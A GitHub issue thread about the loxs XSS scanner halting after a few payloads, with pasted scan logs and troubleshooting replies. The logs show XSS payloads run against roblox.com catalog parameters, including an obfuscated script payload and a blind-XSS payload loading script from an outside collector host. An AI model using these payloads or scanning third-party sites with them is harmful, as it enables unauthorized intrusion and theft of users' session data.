### ISSUE TITLE
Automatically stops running

### ISSUE THREAD

**Issue by bytes-Knight** [coffinxp/loxs#59]
It automatically stops running after processing approximately 4 to 5 payloads.

[i] Starting scan...

┌────────────────────────────────────────────────────────────────────────────────────────────┐
│ → Scanning URL: http://roblox.com/catalog?Category=3&Subcategory=61&CreatorID=1&SortType=3 │
└────────────────────────────────────────────────────────────────────────────────────────────┘

[→] Scanning payload: ‘>alert(154)</script><script/154=’;;;;;;;
[✗] Not Vulnerable: http://roblox.com/catalog?Category=%E2%80%98%3Ealert%28154%29%3C%2Fscript%3E%3Cscript%2F154%3D%E2%80%99%3B%3B%3B%3B%3B%3B%3B&Subcategory=61&CreatorID=1&SortType=3
[→] Scanning payload: ‘>alert(154)</script><script/154=’;;;;;;;
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=%E2%80%98%3Ealert%28154%29%3C%2Fscript%3E%3Cscript%2F154%3D%E2%80%99%3B%3B%3B%3B%3B%3B%3B&CreatorID=1&SortType=3
[→] Scanning payload: ‘>alert(154)</script><script/154=’;;;;;;;
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=61&CreatorID=%E2%80%98%3Ealert%28154%29%3C%2Fscript%3E%3Cscript%2F154%3D%E2%80%99%3B%3B%3B%3B%3B%3B%3B&SortType=3
[→] Scanning payload: ‘>alert(154)</script><script/154=’;;;;;;;
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=61&CreatorID=1&SortType=%E2%80%98%3Ealert%28154%29%3C%2Fscript%3E%3Cscript%2F154%3D%E2%80%99%3B%3B%3B%3B%3B%3B%3B
[→] Scanning payload: <ScriPt>ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()</sCripT>
[✗] Not Vulnerable: http://roblox.com/catalog?Category=%3CScriPt%3E%E1%A8%86%3D%27%27%2C%E1%A8%8A%3D%21%E1%A8%86%2B%E1%A8%86%2C%E1%A8%8E%3D%21%E1%A8%8A%2B%E1%A8%86%2C%E1%A8%82%3D%E1%A8%86%2B%7B%7D%2C%E1%A8%87%3D%E1%A8%8A%5B%E1%A8%86%2B%2B%5D%2C%E1%A8%8B%3D%E1%A8%8A%5B%E1%A8%8F%3D%E1%A8%86%5D%2C%E1%A8%83%3D%2B%2B%E1%A8%8F%2B%E1%A8%86%2C%E1%A8%85%3D%E1%A8%82%5B%E1%A8%8F%2B%E1%A8%83%5D%2C%E1%A8%8A%5B%E1%A8%85%2B%3D%E1%A8%82%5B%E1%A8%86%5D%2B%28%E1%A8%8A.%E1%A8%8E%2B%E1%A8%82%29%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%83%5D%2B%E1%A8%87%2B%E1%A8%8B%2B%E1%A8%8A%5B%E1%A8%8F%5D%2B%E1%A8%85%2B%E1%A8%87%2B%E1%A8%82%5B%E1%A8%86%5D%2B%E1%A8%8B%5D%5B%E1%A8%85%5D%28%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86%29%22%29%28%29%3C%2FsCripT%3E&Subcategory=61&CreatorID=1&SortType=3
[→] Scanning payload: <ScriPt>ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()</sCripT>
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=%3CScriPt%3E%E1%A8%86%3D%27%27%2C%E1%A8%8A%3D%21%E1%A8%86%2B%E1%A8%86%2C%E1%A8%8E%3D%21%E1%A8%8A%2B%E1%A8%86%2C%E1%A8%82%3D%E1%A8%86%2B%7B%7D%2C%E1%A8%87%3D%E1%A8%8A%5B%E1%A8%86%2B%2B%5D%2C%E1%A8%8B%3D%E1%A8%8A%5B%E1%A8%8F%3D%E1%A8%86%5D%2C%E1%A8%83%3D%2B%2B%E1%A8%8F%2B%E1%A8%86%2C%E1%A8%85%3D%E1%A8%82%5B%E1%A8%8F%2B%E1%A8%83%5D%2C%E1%A8%8A%5B%E1%A8%85%2B%3D%E1%A8%82%5B%E1%A8%86%5D%2B%28%E1%A8%8A.%E1%A8%8E%2B%E1%A8%82%29%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%83%5D%2B%E1%A8%87%2B%E1%A8%8B%2B%E1%A8%8A%5B%E1%A8%8F%5D%2B%E1%A8%85%2B%E1%A8%87%2B%E1%A8%82%5B%E1%A8%86%5D%2B%E1%A8%8B%5D%5B%E1%A8%85%5D%28%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86%29%22%29%28%29%3C%2FsCripT%3E&CreatorID=1&SortType=3
[→] Scanning payload: <ScriPt>ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()</sCripT>
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=61&CreatorID=%3CScriPt%3E%E1%A8%86%3D%27%27%2C%E1%A8%8A%3D%21%E1%A8%86%2B%E1%A8%86%2C%E1%A8%8E%3D%21%E1%A8%8A%2B%E1%A8%86%2C%E1%A8%82%3D%E1%A8%86%2B%7B%7D%2C%E1%A8%87%3D%E1%A8%8A%5B%E1%A8%86%2B%2B%5D%2C%E1%A8%8B%3D%E1%A8%8A%5B%E1%A8%8F%3D%E1%A8%86%5D%2C%E1%A8%83%3D%2B%2B%E1%A8%8F%2B%E1%A8%86%2C%E1%A8%85%3D%E1%A8%82%5B%E1%A8%8F%2B%E1%A8%83%5D%2C%E1%A8%8A%5B%E1%A8%85%2B%3D%E1%A8%82%5B%E1%A8%86%5D%2B%28%E1%A8%8A.%E1%A8%8E%2B%E1%A8%82%29%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%83%5D%2B%E1%A8%87%2B%E1%A8%8B%2B%E1%A8%8A%5B%E1%A8%8F%5D%2B%E1%A8%85%2B%E1%A8%87%2B%E1%A8%82%5B%E1%A8%86%5D%2B%E1%A8%8B%5D%5B%E1%A8%85%5D%28%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86%29%22%29%28%29%3C%2FsCripT%3E&SortType=3
[→] Scanning payload: <ScriPt>ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()</sCripT>
[✗] Not Vulnerable: http://roblox.com/catalog?Category=3&Subcategory=61&CreatorID=1&SortType=%3CScriPt%3E%E1%A8%86%3D%27%27%2C%E1%A8%8A%3D%21%E1%A8%86%2B%E1%A8%86%2C%E1%A8%8E%3D%21%E1%A8%8A%2B%E1%A8%86%2C%E1%A8%82%3D%E1%A8%86%2B%7B%7D%2C%E1%A8%87%3D%E1%A8%8A%5B%E1%A8%86%2B%2B%5D%2C%E1%A8%8B%3D%E1%A8%8A%5B%E1%A8%8F%3D%E1%A8%86%5D%2C%E1%A8%83%3D%2B%2B%E1%A8%8F%2B%E1%A8%86%2C%E1%A8%85%3D%E1%A8%82%5B%E1%A8%8F%2B%E1%A8%83%5D%2C%E1%A8%8A%5B%E1%A8%85%2B%3D%E1%A8%82%5B%E1%A8%86%5D%2B%28%E1%A8%8A.%E1%A8%8E%2B%E1%A8%82%29%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%83%5D%2B%E1%A8%87%2B%E1%A8%8B%2B%E1%A8%8A%5B%E1%A8%8F%5D%2B%E1%A8%85%2B%E1%A8%87%2B%E1%A8%82%5B%E1%A8%86%5D%2B%E1%A8%8B%5D%5B%E1%A8%85%5D%28%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86%29%22%29%28%29%3C%2FsCripT%3E
[→] Scanning payload: '"><script src=https://xss.report/c/bytes></script>
[✗] Not Vulnerable: http://roblox.com/catalog?Category=%27%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fxss.report%2Fc%2Fbytes%3E%3C%2Fscript%3E&Subcategory=61&CreatorID=1&SortType=3
[→] Scanning payload: '"><script src=https://xss.report/c/bytes></script>
[!] Error during scan: HTTPConnectionPool(host='localhost', port=48627): Read timed out. (read timeout=120)
→ Scanning finished.
• Total found: 0
• Total scanned: 9
• Time taken: 163 seconds
[?] Do you want to generate an HTML report? (y/n):

![image_2024-11-12_222919538](https://github.com/user-attachments/assets/6a9085e9-da41-4072-bbbe-4d0ee13222ed)

**Comment by moin-gun** [comment]
Hey @limon205 check `htop` beside your tab that's running XSS tool. If memory or CPU gets overloaded then the chromedriver may stop. Also check if the file you're passing have more payloads not just 4-5

**Comment by bytes-Knight** [comment]
Hey @moin-gun,

Thanks for the suggestion! I’ve already checked everything as you mentioned—CPU and memory usage with `top` seem stable, and the file I'm using has a substantial number of payloads, so that's covered too. The issue occurs when the tool shows this error:

`[!] Error during scan: HTTPConnectionPool(host='localhost', port=48627): Read timed out. (read timeout=120)`

It is related to a connection timeout rather than system resource limitations. I would appreciate any other insights on resolving this!

Thanks!

**Comment by moin-gun** [comment]
Hi @limon205 I can give one more suggestion. Go to line no. 229 in xss.py and change value of timeout from 1 to 3 or 5 and run again.

**Comment by bytes-Knight** [comment]
Hi @moin-gun,

Thank you for your suggestion! As you recommended, I changed the timeout value from 1 to 5.

![image_2024-11-16_121734498](https://github.com/user-attachments/assets/4df9f186-2c6a-4bf4-8822-c00a3ca74afe)

Unfortunately, I'm still encountering the same issue. The tool exits before even displaying this error:

`[!] Error during scan: HTTPConnectionPool(host='localhost', port=48627): Read timed out. (read timeout=120)`

![image_2024-11-16_121554292](https://github.com/user-attachments/assets/4f0c7fe8-8137-4f2f-bad5-fd8acfd0afed)

It appears that the problem persists despite the timeout adjustment. Please let me know if you have any other ideas for troubleshooting this!

Thanks!

**Comment by coffinxp** [comment]
try with other site it will work
